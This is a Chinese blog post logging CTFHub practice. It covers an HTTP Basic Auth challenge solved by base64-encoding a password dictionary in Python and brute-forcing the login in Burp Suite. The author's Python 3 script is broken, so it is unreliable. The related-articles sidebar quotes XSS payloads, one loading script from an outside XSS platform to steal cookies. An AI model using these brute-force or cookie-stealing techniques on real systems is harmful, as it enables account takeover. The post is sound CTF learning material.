CTFHUB学习记录(四)

最新推荐文章于 2024-03-28 22:00:00 发布
最新推荐文章于 2024-03-28 22:00:00 发布
阅读量375 收藏
点赞数
分类专栏: CTFHUB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45882317/article/details/104617208
版权

web之前置技能

HTTP协议之基础认证
在这里插入图片描述
题目给了相关链接:https://zh.wikipedia.org/wiki/超文本传输协议(墙)
https://zh.wikipedia.org/wiki/HTTP基本认证
浏览后找到关键点:

1、用户名和密码是由base64加密,在Authorization中

2、WWW-Authenticate: Basic realm="Secure Area"是提示信息,“ ”中是提示内容

开始做题
在这里插入图片描述
click后弹出对话框,提示用户名为admin,结合题目附件给的密码,再抓包修改Authorization的值(采用burpsite的爆破功能)
问题来了,我该如何批量base64加密?
查看writeup:

作者使用Python脚本写的加密

import base64
 
f=open('10_million_password_list_top_100.txt','r')
spring=open('test123456.txt','w')
lines=f.readlines()
for line in lines:
    Authorization="admin:"+line.strip('\n')
    Authorizationbs64=base64.b64encode(Authorization)
    print Authorizationbs64
    spring.write(Authorizationbs64)
    spring.write("\n")
 
f.close()
spring.close()

或者

#!/usr/bin/env python3
import base64

# 字典文件路径
dic_file_path = '/Users/wujing/Downloads/10_million_password_list_top_100.txt'
with open(dic_file_path, 'r') as f:
    password_dic = f.readlines()

username = "admin" # 用户名
for password in password_dic:
    encodestr = base64.b64encode("admin:" + password.strip())
    print(encodestr)

加密原理:

编码原理为:每个字节8位,每次取出3个字节,也就是3 x 8 = 24
位。然后每次从此24位中取出6位,然后在前端补2位0,组成新的8位,也就是一个字节。这样就将3个字节转换成了4个字节。由于前面两位都是0,所以转换后的每个字节能表示的最大数字为63,
也就是说转换后的每个字节只可能是0-63中的一个数字。 然后根据规范给出的Base64索引表,将0-63
这64个数字转换成"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/“中的一个。
当最后取出3个字节不够时,不够的位置补0,并且最后少一个字节时编码的最后加一个“=”,少两个字节时加两个”="。

在后面的自我实践中中,writeup中的脚本不能在我的ide中运行,两者原因都是python2转到python3不兼容,报错:a bytes-like object is required, not ‘str’
一番修改:

import base64 

f=open('C:/Users/YHY/Desktop/10_million_password_list_top_100.txt','r')
spring=open('C:/Users/YHY/Desktop/m.txt','w')
lines=f.readlines()for line in lines:    
	Authorization="admin:"+line.strip('\n')    
	Authorization=bytes(Authorization,encoding='utf-8')
	Authorizationbs64=base64.b64encode(Authorization)
    	print (Authorizationbs64)
    	Authorizationbs64=Authorizationbs64.decode()    
    	spring.write(Authorizationbs64)    
    	spring.write("\n")
f.close()
spring.close()

但出现了错误:

web基础认证题的base64加密中,我用脚本加密后,burpsite跑后没一个正确,看writeup后,对比截图的12个base64和我的一模一样。后来我一个一个试密码,找到密码后,发现我的base64在网站上解密后再加密就不是原来的base64。抓包后对比base64码,发现我的base64码不对,但我的base64码解密后再加密得到的base64码与抓包的一致,是我的脚本出现了问题?

有人说是,决定学好python 再解决此问题

ScyLamb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Ctfhub Web-web前置技能-http协议
菜鸟的博客
05-27 430
01题目:请求方式 打开网站 发现题目给了提示,说使用CTFHUB请求方式即可获取到flag 然后burp抓包,修改 falg: ctfhub{8ef53030a428ad4ac9bb0a55} —————————————————————— 02题目:302跳转 打开网站 按F12,然后点击Give me fiag,发现点击这个链接有index.php文件闪过,而且状态码是302 解法1: 打开burp抓包把包放到Repeater,将index.html修改为index.php,点击go,即可看到f
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
2019 CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
CTFshow_web入门_信息搜集
ScyLamb的博客
01-20 262
https://blog.csdn.net/qq_44893894/article/details/109380529 0x00 web1 payload:查看源代码 0x01 web2 <script type="text/javascript"> window.oncontextmenu = function(){return false}; window.onselectstart = function(){return false}; window.onkeydown = func
ctfhub之xss
小宇的web博客
05-22 1629
ctfhub之xss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解题流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
[ctfhub]-xss详解
weixin_52116519的博客
04-28 4914
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射型XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
史上最全的CTFHUB弱口令+默认口令解题过程
m0_75235064的博客
11-18 2813
读万卷书,行万里路......
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 ...url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
3.18号日报,ctfhub中web,文件上传漏洞题目解法
03-18
文件上传漏洞
CtfHub-wp(web)
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
ctfhub-技能树-xss题集全部习题详解-最新
weixin_73562787的博客
08-10 3250
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
CTFHUB——反射型XSS详解
wuuconix's blog
09-01 7582
背景 本来看ctfhub上有xss的题目,打算好好学习一波,结果点开一看,只有一道题2333。 便现在dvwa上熟悉了一波。所谓反射型是相对于存储型来讲的。 如果黑客的xss注入是通过某种方式储存到了数据库中,那就是存储型的,这种xss的特点就是每次访问该页面都会收到xss攻击,因为js语句已经放在数据库里了。 而反射型xss则不是这样,每次触发只能手动输入和点击才能触发。 我认为xss产生的原因主要是对便签审查不严格造成的。 dvwa xss例题 下面写一下dvwa中的三种难度的反射型xss。 <?
[ctf学习]ctfhub技能树-web
小飒的博客
07-05 1670
背景知识 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 方法 1、OPTIONS 返回服务器针对特定资源所支持的HTTP请求方法,也可以利用向web服务器发送‘*’的请求来测试服务器的功能性 2、HEAD 向服务器索与GET请求相一致的响应,只不过响应体将不会被返回。这一方法可以再不必传输整个响应内容的情况下,就可以获取包含在响应小消息头中的元信息。 3、GET 向特定的资源发出请求。注意:GET方法不应当被用于产生“副作用”的操作中,例如在Web A
CTFHub——XSS
最新发布
2302_79119987的博客
03-28 897
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
CTFHub】XSS漏洞_反射型
Mitchell_Donovan的博客
04-20 995
CTFHub_反射型XSS 原题链接 key:反射型XSS的注入与利用 ①原题界面如下???? 简单地尝试一下有无反射型XSS漏洞,在第一个框内提交以下XSS弹窗语句???? <script>alert(1)</script> 发现成功弹窗,说明存在XSS漏洞 ②登陆平台XSSplatform,创建新项目???? 进行相关配置???? ③查看项目代码???? 这都不重要,在底部找到使用方法???? ④把其中一条攻击代码复制下
CTFHubWeb—HTTP协议
qq_45927819的博客
08-04 539
文章目录curl使用方法请求方式方法一方法二302跳转方法一方法二Cookie方法一方法二基础认证响应包源代码 curl使用方法 参考https://blog.csdn.net/weixin_45694388/article/details/109594729? 请求方式 根据提示我们应该是需要修改请求方法为CTFHub,并且需要请求index.php 方法一 方法二 使用curl命令查看服务器的返回信息 curl -v -X CTFHUB challenge-9661cba9e188a4c8.sand
ctfhub技能书+历年真题学习笔记(详解)
热门推荐
qq_50589021的博客
03-30 7万+
Web Web前置技能 HTTP协议 请求方式 题目: HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. 意思就是你是get请求,你把这个请求换成CTFHUB就行 所以抓包直接一把梭 302跳转 题目: No Flag here! Give me Flag 点击发现没有跳转
CTFHUB-Http协议
cainiao17441898的博客
03-11 639
CTFHUB-请求方式 关于http请求的方法和其他知识就看这个链接: 1.HTTP Method 是可以自定义的,并且区分大小写,直接用 CTFHUB 方法请求 index.php 即可拿到 flag。windows打开cmd输入:curl -v -X CTFHUB http://challenge-d2ecdef791f4e8ee.sandbox.ctfhub.com:10080/index.php就可以得到flag。 curl命令见:https://www.cnblogs.com/guixiaomi
ctfhub请求申请
10-09
要申请CTFHub,你可以按照以下步骤进行: 1. 访问CTFHub官方网站(https://www.ctfhub.com/)。 2. 点击网站上的注册按钮,进入注册页面。 3. 在注册页面填写所需的个人信息,包括用户名、密码和电子邮件地址。 4. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值